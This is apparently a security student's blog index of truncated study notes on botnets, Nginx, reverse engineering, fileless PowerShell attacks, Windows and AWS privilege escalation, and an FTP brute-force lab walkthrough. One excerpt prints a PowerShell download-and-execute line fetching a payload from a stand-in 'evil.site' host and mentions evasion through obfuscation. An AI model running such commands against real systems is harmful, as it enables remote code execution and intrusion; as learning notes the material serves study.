1. Botnet Takedown Challenge- Investigate the infected machine, identify IOCs (Indicators of Compromise), find the malware or script, determine how it works, and neutralize the botnet connection. 2. Botnet?- A botnet is a network of infected computers (bots) controlled by a central attacker (botmaster).- These bots may receive commands via C2, IRC servers, Web requests, Reverse Shells 3. What is..
Study Record
1. Nginx?- It is a lightweight, high-performance web server- It handles HTTP/HTTPS requests, delivering static files like HTML, CSS, and more to clients.- It can also act as a reverse proxy. 2. Nginx Configuration File Structure- /etc/nginx/nginx.conf- /etc/nginx/sites-available/default 1) Sample:server { listen 443 ssl; # Listen on port 443 for HTTPS server_name example.com; # Your doma..
1. What is Reverse EngineeringRE (Reverse Engineering) is the process of taking apart software (or hardware) to:- Understand how it works- Detect vulnerabilities or malicious behavior- Modify or patch it- Bypass protections In simpler words:- You get a compiled program (you can't see the code, but you figure out how it works anyway." 2. Reverse Engineering Tools1) Ghidra - disassembler and deco..
1. Fileless?- Fileless attacks are malicious scripts or commands that never touch disk- They only exist in memory, making them harder to detect with antivirus or endpoint detection systems.- PowerShell is perfect for fileless execution. 2. Download & Execute Code From the InternetIEX (New-Object Net.WebClient).DownloadString('http://evil.site/payload.ps1') 3. Obfuscation Techniques (Avoiding Det..
1. Where are PowerShell logs stored?- Event Viewer > Applications and Services Logs > Microsoft > Windows > PowerShell > Operational 2. How to view Powershell logs via CLIGet-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10 | Format-List 3. Decoding Base64 Encoded PowerShell Payloads- Attackers often hide commands using -EncodedCommand- Decode it like this:[System.Text...
1. HKCU- HKEY_CURRENT_USER- 현재 로그인한 사용자의 설정 2. HKLM- HKEY_LOCAL_MACHINE- 모든 사용자에게 적용되는 시스템 전체 설정
1. User & Permission Enumeration 1) Check current user identitywhoami 2) Check user privilegeswhoami /priv 3) List all local users on the systemGet-LocalUser 4) Check what groups your user belongs towhoami /groups 2. Finding Privilege Escalation Opportunities1) Check if PowerShell is running as an Administrator[System.Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains "S-1-5-32-5..
1. PowerShell- Command-line shell and scripting language built into Windows- Unlike the traditional cmd, PowerShell can:1) work with objects instead of just text2) interact directly with the Windows API and registry3) execute powerful scripts and modules 2. PowerShell Syntax- PowerShell commands are called cmdlets- They always follow the Verb-Noun formatGet-Process # Lists running processes..
1. Key AWS Concepts1) IAM (Identity and Access Management)- Users: Actual people or systems who access AWS- Roles: Permission sets that can be assumed temporarily.- Policies: JSON documents that define what actions are allowed or denied.- Groups: Collections of users that share permissions 2) Important AWS Services for Privilege Escalation- STS (Security Token Service): Used to assume roles- EC2..
1. Initial Enumeration with NmapWe begin by scanning the target machine using nmap to identify open ports and running servicesWe have found there are 2 open ports, FTP(21), ssh(22) 2. FTP Bruteforce AttackSince FTP is open, we attempt to brute-force the login credentials using wordlists, username.list and password.list.We have found the login name and the password. 3. Accessing FTP and Extractin..
1. Error message 2. Solutioncd /etc/aptsudo cp trusted.gpg trusted.gpg.d
1. ERROR 2. Solution
